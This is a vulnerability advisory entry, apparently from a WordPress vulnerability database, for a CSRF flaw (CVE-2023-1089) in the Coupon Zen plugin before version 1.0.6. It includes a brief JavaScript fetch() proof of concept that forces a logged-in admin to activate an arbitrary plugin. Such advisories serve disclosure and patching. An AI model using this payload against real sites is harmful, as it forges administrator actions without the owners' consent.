Lucene search
WpvulndbWPVDB-ID:9787E26F-33FE-4C65-ABB3-7F5C76AE8D6FHistoryFeb 28, 2023 - 12:00 a.m.
Coupon Zen < 1.0.6 - Arbitrary Plugin Activation via CSRF
2023-02-2800:00:00
wpscan.com
2
coupon zen
arbitrary plugin activation
csrf
security
wordpress
0.001 Low
EPSS
Percentile
21.2%
The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack
PoC
fetch(‘https://example.com/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=couponzen_ajax_plugin_activation&location;=woocommerce/woocommerce.php’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
| CPE | Name | Operator | Version |
|---|---|---|---|
| coupon-zen | lt | 1.0.6 |
Related
nvd
nvd
CVE-2023-1089
2023-03-27 16:15:09
wpexploit
wpexploit
Coupon Zen < 1.0.6 - Arbitrary Plugin Activation via CSRF
2023-02-28 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-03-27 16:15:00
cvelist
cvelist
CVE-2023-1089 Coupon Zen < 1.0.6 - Arbitrary Plugin Activation via CSRF
2023-03-27 15:37:20
cve
cve
CVE-2023-1089
2023-03-27 16:15:09